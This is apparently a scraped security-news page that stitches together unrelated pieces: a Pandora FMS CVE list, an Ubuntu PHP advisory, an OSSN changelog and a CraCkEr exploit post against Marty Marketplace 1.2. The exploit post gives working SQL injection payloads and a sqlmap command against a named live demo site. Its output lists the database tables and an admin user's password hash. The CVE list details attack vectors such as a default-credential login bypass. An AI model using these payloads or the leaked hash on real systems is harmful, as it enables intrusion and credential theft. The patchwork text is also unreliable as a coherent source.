in the name field of a visual console 25 Jun 2021 755 CVE-2021-32100 A remote file inclusion vulnerability exists in Artica Pandora FMS 742, exploitable by the lowest privileged user. 29 Jan 2020 743 CVE-2021-32099 A SQL injection vulnerability in the pandora\_console component of Artica Pandora FMS 742 allows an nauthenticated attacker to upgrade his unprivileged session via the /include/chart\_generator.php session\_id parameter, leading to a login bypass. 29 Jan 2020 743 CVE-2021-32098 functions\_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf\_live\_view ip\_dst, dst\_port, or src\_port parameter, a different vulnerability than CVE-2019-20224. 29 Jan 2020 743 CVE-2020-8947 functions\_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf\_live\_view ip\_dst, dst\_port, or src\_port parameter, a different vulnerability than CVE-2019-20224. 18 Dec 2019 742 CVE-2020-8511 In Artica Pandora FMS through 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the File Repository component, a different issue than CVE-2020-7935 and CVE-2020-8500. 8 Jun 2021 93 CVE-2020-8500 \*\* DISPUTED \*\* In Artica Pandora FMS 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the Updater or Extension component. NOTE: The vendor reports that this is intended functionality. 8 Jun 2021 93 CVE-2020-8497 In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. 8 Jun 2021 93 CVE-2020-7935 Artica Pandora FMS through 7.42 is vulnerable to remote PHP code execution because of an Unrestricted Upload Of A File With A Dangerous Type issue in the File Manager. An attacker can create a (or use an existing) directory that is externally accessible to store PHP files. The filename and the exact path is known by the attacker, so it is possible to execute PHP code in the context of the application. The vulnerability is exploitable only with Administrator access. 8 Jun 2021 755 CVE-2020-5844 index.php?sec=godmode/extensions&sec2=extensions/files\_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742\_FIX\_PERL2020. 10 Feb 2021 752 CVE-2020-26518 Pandora FMS before 743 allows unauthenticated attackers to conduct SQL injection attacks via the pandora\_console/include/chart\_generator.php session\_id parameter. 2 Oct 2020 743 CVE-2020-13855 Pandora FMS 744 allows arbitrary file upload (leading to remote command execution) via the File Repository Manager feature. 4 Jun 2020 745 CVE-2020-13854 Pandora FMS 744 allows privilege escalation. 4 Jun 2020 745 CVE-2020-13853 Pandora FMS 744 has persistent XSS in the Messages feature. 4 Jun 2020 745 CVE-2020-13852 Pandora FMS 744 allows arbitrary file upload (leading to remote command execution) via the File Manager feature. 4 Jun 2020 745 CVE-2020-13851 Pandora FMS 744 allows remote command execution via the events feature. 4 Jun 2020 745 CVE-2020-13850 Artica Pandora FMS 744 has inadequate access controls on a web folder. 4 Jun 2020 747 CVE-2020-11749 Pandora FMS 7.0 NG 746 suffers from Multiple XSS vulnerabilities in different browser views. A network administrator scanning a SNMP device can trigger a Cross Site Scripting (XSS), which can run arbitrary code to allow Remote Code Execution as root or apache2. 14 Apr 2020 747 CVE-2020-8947 Allows remote attackers to execute arbitrary OS commands via shell metacharacters in the netflow report. It needs valid credentials to success. 12 Feb 2020 743 CVE-2020-8511 Pandora FMS through 7.42, admin users can execute arbitrary code by uploading a .php file via the File Repository component. 31 Jan 2020 N/A CVE-2020-8497 Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. 30 Jan 2020 746 CVE-2020-7935 Artica Pandora FMS through 742 is vulnerable to remote PHP code execution because of an Unrestricted Upload Of A File With A Dangerous Type issue in the File Manager by the admin user. The vulnerability is exploitable only with Administrator access. 23 Jan 2020 N/A CVE-2020-5844 Files\_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. 6 Jan 2020 743 CVE-2019-20224 Netflow stats in Pandora FMS NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip\_src parameter. 2 Jan 2020 742 CVE-2019-20050 Pandora FMS 742 suffers from a remote code execution vulnerability. To exploit the vulnerability, an authenticated user should create a new folder with a "tricky" name in the filemanager. The exploit works when the php-fileinfo extension is disabled on the host system. The attacker must include shell metacharacters in the content type. 27 Dec 2019 742 CCVE-2019-13035 Pandora FMS 7.0 NG before 735 suffers from local privilege escalation due to improper permissions on C:\\PandoraFMS and its sub-folders, allowing standard users to create new files. Moreover, the Apache service httpd.exe will try to execute cmd.exe from C:\\PandoraFMS (the current directory) as NT AUTHORITY\\SYSTEM upon web requests to the portal. This will effectively allow non-privileged users to escalate privileges to NT AUTHORITY\\SYSTEM. 29 Jun 2019 735 CVE-2018-11223 XSS in Artica Pandora FMS before 723 allows an attacker to execute arbitrary code via a crafted "refr" parameter. 16 May 2018 723 CVE-2018-11222 Local File Inclusion (LFI) in Pandora FMS through version 723 allows an attacker to call any php file via the /pandora\_console/ajax.php ajax endpoint. 16 May 2018 723 CVE-2018-11221 Unauthenticated untrusted file upload in Pandora FMS through version 723 allows an attacker to upload an arbitrary plugin via include/ajax/update\_manager.ajax in the update system. 16 May 2018 723 CVE-2017-15937 Pandora FMS version 7.0 leaks a full installation pathname via GET data when intercepting the main page's graph requisition. This also implies that general OS information is leaked (e.g., a /var/www pathname typically means Linux or UNIX). 27 Oct 2017 714 CVE-2017-15936 Pandora FMS NG an Attacker with write Permission can create an agent with an XSS Payload; when a user enters the agent definitions page, the script will get executed. 27 Oct 2017 714 CVE-2017-15935 Pandora FMS 7.0 vulnerable to remote PHP code execution through the manager files function. This is only exploitable by administrators who upload a PHP file. 27 Oct 2017 714 CVE-2017-15934 Pandora FMS 7.0 is vulnerable to stored Cross-Site Scripting in the map name parameter. 27 Oct 2017 714 CVE-2010-4283 PHP remote file inclusion vulnerability in extras/pandora\_diag.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the argv\[1\] parameter. 17 Nov 2014 3.1.1 CVE-2010-4282 Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora\_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. 17 Nov 2014 3.1.1 CVE-2010-4281 Incomplete blacklist vulnerability in the safe\_url\_extraclean function in ajax.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code by using a page parameter containing a UNC share pathname, which bypasses the check for the : (colon) character. 17 Nov 2014 3.1.1 CVE-2010-4280 Multiple SQL injection vulnerabilities in Pandora FMS before 3.1.1 allow remote authenticated users to execute arbitrary SQL commands via (1) the id\_group parameter in an operation/agentes/ver\_agente action to ajax.php or (2) the group\_id parameter in an operation/agentes/estado\_agente action to index.php, related to operation/agentes/estado\_agente.php. 17 Nov 2014 3.1.1 CVE-2010-4279 The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash\_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash\_user parameter, in conjunction with the md5 hash of "admin" in the loginhash\_data parameter. 17 Nov 2014 3.1.1 CVE-2010-4278 operation/agentes/networkmap.php in Pandora FMS before 3.1.1 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the layout parameter in an operation/agentes/networkmap action to index.php. 17 Nov 2014 3.1.1 CVE-2014-8629 Cross-site scripting (XSS) vulnerability in the Page visualization agents in Pandora FMS 5.1 SP1 and earlier allows remote attackers to inject arbitrary web script or HTML via the refr parameter to index.php. 11 Nov 2014 5.1 SP2

CVE-2022-2059: Pandora FMS Common Vulnerabilities and Exposures

Ubuntu Security Notice 5530-1 - It was discovered that PHP incorrectly handled certain memory operations when obtaining file information. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5530-1July 25, 2022php8.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PHP could be made to crash or run programs if it processed speciallycrafted data.Software Description:- php8.1: HTML-embedded scripting language interpreterDetails:It was discovered that PHP incorrectly handled certain memory operationswhen obtaining file information. A remote attacker could use this issue tocause PHP to crash, resulting in a denial of service, or possibly executearbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libapache2-mod-php8.1           8.1.2-1ubuntu2.2  php8.1-cgi                      8.1.2-1ubuntu2.2  php8.1-cli                      8.1.2-1ubuntu2.2  php8.1-fpm                      8.1.2-1ubuntu2.2  php8.1-mysql                    8.1.2-1ubuntu2.2  php8.1-pgsql                    8.1.2-1ubuntu2.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5530-1  CVE-2022-31627Package Information:  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.2

Ubuntu Security Notice USN-5530-1

Marty Marketplace Multi Vendor Ecommerce Script version 1.2 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                       [ Exploits ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : sangvish.com                   │ │                                         ││  Vendor   : SangVish Technologies          │ │                                         ││  Software : Marty Marketplace Multi Vendor │ │  Open Source Marketplace PHP script for ││             Ecommerce Script v1.2          │ │  eCommerce marketplace platforms        ││  Vuln Type: Remote SQL Injection           │ │  in the market                          ││  Method   : GET                            │ │                                         ││  Impact   : Database Access                │ │                                         ││                                            │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise.                                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk     loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear            CryptoJob (Twitter) twitter.com/CryptozJob          Special Greetz to The Lebanese National Basketball Team for the results of     the FIBA Asia Cup┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                     © CraCkEr 2022                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'attributes[]' is vulnerable---Parameter: attributes[] (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)---Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6[+] Starting the Attacksqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch[+] fetching current database[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.6[INFO] retrieved: 'garudan_buy2marty'current database: 'garudan_buy2marty'[+] fetching tables for database: 'garudan_buy2marty'Database: garudan_buy2marty[105 tables]+----------------------------------------+| activations                            || ads                                    || ads_translations                       || audit_histories                        || categories                             || categories_translations                || contact_replies                        || contacts                               || dashboard_widget_settings              || dashboard_widgets                      || ec_brands                              || ec_brands_translations                 || ec_cart                                || ec_currencies                          || ec_customer_addresses                  || ec_customer_password_resets            || ec_customers                           || ec_discount_customers                  || ec_discount_product_collections        || ec_discount_products                   || ec_discounts                           || ec_flash_sale_products                 || ec_flash_sales                         || ec_flash_sales_translations            || ec_grouped_products                    || ec_order_addresses                     || ec_order_histories                     || ec_order_product                       || ec_orders                              || ec_product_attribute_sets              || ec_product_attribute_sets_translations || ec_product_attributes                  || ec_product_attributes_translations     || ec_product_categories                  || ec_product_categories_translations     || ec_product_category_product            || ec_product_collection_products         || ec_product_collections                 || ec_product_collections_translations    || ec_product_cross_sale_relations        || ec_product_label_products              || ec_product_labels                      || ec_product_labels_translations         || ec_product_related_relations           || ec_product_tag_product                 || ec_product_tags                        || ec_product_tags_translations           || ec_product_up_sale_relations           || ec_product_variation_items             || ec_product_variations                  || ec_product_with_attribute              || ec_product_with_attribute_set          || ec_products                            || ec_products_translations               || ec_reviews                             || ec_shipment_histories                  || ec_shipments                           || ec_shipping                            || ec_shipping_rule_items                 || ec_shipping_rules                      || ec_store_locators                      || ec_taxes                               || ec_wish_lists                          || failed_jobs                            || faq_categories                         || faq_categories_translations            || faqs                                   || faqs_translations                      || jobs                                   || language_meta                          || languages                              || media_files                            || media_folders                          || media_settings                         || menu_locations                         || menu_nodes                             || menus                                  || meta_boxes                             || migrations                             || mp_customer_revenues                   || mp_customer_withdrawals                || mp_stores                              || mp_vendor_info                         || newsletters                            || pages                                  || pages_translations                     || password_resets                        || payments                               || post_categories                        || post_tags                              || posts                                  || posts_translations                     || revisions                              || role_users                             || roles                                  || settings                               || simple_slider_items                    || simple_sliders                         || slugs                                  || tags                                   || tags_translations                      || translations                           || user_meta                              || users                                  || widgets                                |+----------------------------------------+[+] fetching columns for table 'users' in database 'garudan_buy2marty'Database: garudan_buy2martyTable: users[15 columns]+-------------------+---------------------+| Column            | Type                |+-------------------+---------------------+| avatar_id         | int(10) unsigned    || created_at        | timestamp           || email             | varchar(191)        || email_verified_at | timestamp           || first_name        | varchar(191)        || id                | bigint(20) unsigned || last_login        | timestamp           || last_name         | varchar(191)        || manage_supers     | tinyint(1)          || password          | varchar(191)        || permissions       | text                || remember_token    | varchar(100)        || super_user        | tinyint(1)          || updated_at        | timestamp           || username          | varchar(60)         |+-------------------+---------------------+[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'Database: garudan_buy2martyTable: users[1 entry]+----+----------+--------------------------------------------------------------+------------+-------------+| id | username | password                                                     | super_user | permissions |+----+----------+--------------------------------------------------------------+------------+-------------+| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |+----+----------+--------------------------------------------------------------+------------+-------------+                 Possible algorithms: bcrypt $2*$, Blowfish (Unix)[-] Done

Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.

OSSN - OPEN SOURCE SOCIAL NETWORK v6.3 LTS

*   \[E\] Allow all callables for extend view #2024
*   \[E\] avoiding unnecessary handling of extra space at comment start #2029
*   \[B\] skip friend access check if page visitor is not logged in #2037
*   \[B\] User can not comment on friend only, own album photo #2039
*   \[B\] OssnSounds missing the button for sound on/off #2032
*   \[E\] Make sure addUser also run isEmail validation #2022
*   \[E\] Multiple select (html) handler #2040
*   \[B\] jqueryui-datepicker fails on Google translated pages #2036
*   \[B\] ossn\_delete\_relationship recursive not working #2035
*   \[E\] add a new function ossn\_get\_relation\_by\_id() #2034
*   \[B\] UI add friend success text goes wrong position #2027
*   \[E\] update version and pre-requisite OssnEmbed #2045
*   \[B\] fixed unallowed
    
    inside paragraph again #2044
    
*   \[E\] load css for video in #2043
*   \[E\] make video visible in #2042
*   \[E\] Add provided by giphy footer or banner #2049
*   \[E\] Correction of term 'miinutos' to 'minutos' #2048
*   \[E\] CLI + cron library and documentation on community #2050
*   \[B\] fixed calling unavailable/mistyped function #2051
*   \[E\] OssnMail 'email', 'send:policy' 3rd parameter #2052
*   \[E\] \[E\] optimized getMyGroups() #2071
*   \[E\] optimized OssnGroup::isMember() #2070
*   \[E\] optimized OssnGroup::getMembersRequests() #2069
*   \[E\] optimized group join-requests counter #2067
*   \[E\] PHP8 prevent bool->guid warnings #2058
*   \[B\] fixed missing error handler for not existing subpages #2055
*   \[E\] Add confirmation before deleting photos #2073
*   \[E\] Enhance group menu entries in sidebar #2072
*   \[B\] PHP8 If deleted comments tried to be deleted again #2057
*   \[B\] OssnNotification if poster and owner is same participants hook never run #2053
*   \[B\] Fix the like:object view menu type introduced in #1868 #2081
*   \[E\] Replace translation PT #2079 #2075
*   \[E\] Improve mod\_rewrite CURL functionality #2078
*   \[B\] fixed use of undefined variable $object #2084
*   \[E\] Some small locale fixes. #2087
*   \[B\] PHP Warning: preg\_match(): Compilation failed (#2018). #2086
*   \[B\] fix creating incomplete wall entities if addPhoto() fails #2088
*   \[B\] prevent warning if $fields is false #2137 #2136 #2135
*   \[E\] Update PHP version to minimum 8 #2061
*   \[B\] Comment Static photo should have only filename no fullpath #2090
*   \[B\] No notification to participants if someone comments on profile photo , cover, album photo #2054
*   \[B\] jqueryui-datepicker fails on Google translated pages #2036
*   \[E\] Removal of old upgrade scripts #2085
*   \[E\] Enhance OssnFile and Include CDN option #2089
*   \[E\] fixed different 'readonly' colors #2134
*   \[B\] missing check if member has a cover image #2093
*   \[E\] some installation warnings #2018
*   \[E\] don't list unvalidated members #2144
*   \[B\] Multiple clicks on same action add member multiple times in group #2147
*   \[B\] col-xs not anymore with BS5 #2017
*   \[E\] Remove php5 apache config and update post and upload sizes #2033
*   \[E\] Stop rewriting .htaccess every time page loads during installation #2091
*   \[B\] Deleting a group should remove group:joinrequest records #2066
*   \[E\] Enable linkifying of Entity comments #2080
*   \[B\] wrong class extending in all input plugins #2146
*   \[E\] Ossn::File MaxSize() add UploadMaxSize #2148
*   \[B\] getting orphan notification records of type comments:post:group:wall #2060
*   \[E\] isModerator (for groups) in comments section also. #2025
*   \[E\] Added OssnJWT class based on firebase/JWT
*   \[E\] Updated cacert.pem
*   \[E\] Updated PHP MAILER to 6.6.0
*   \[B\] Pagination not responsive #2150
*   \[E\] Show components in admin panel in ASC order of their installation #2155
*   \[E\] Component delete confirmation if wanted to keep settings. #2152
*   \[T\] OssnUser::getFriends() #2149
*   \[B\] Pagination not responsive #2150
*   \[B\] btn-sm have no effect #2153
*   \[B\] missing checkbox-block span style #2145
*   \[B\] Non logged in visitor can view private posts #2158
*   \[B\] OssnChat default value showing 0 in class #2163
*   \[E\] Request for new user image classes defining the shape only #2143
*   \[B\] Post background not breaking if str > 125 chars #2164
*   \[B\] deleting profile photo gives error on iconURL() #2166
*   \[B\] deleting profile cover gives error on coverURL() #2166

Special Thanks to Michael Zülsdorff (aka Zetman) (https://www.opensource-socialnetwork.org/u/zetman) for testing and bug reporting, fixing.

Tag

#apache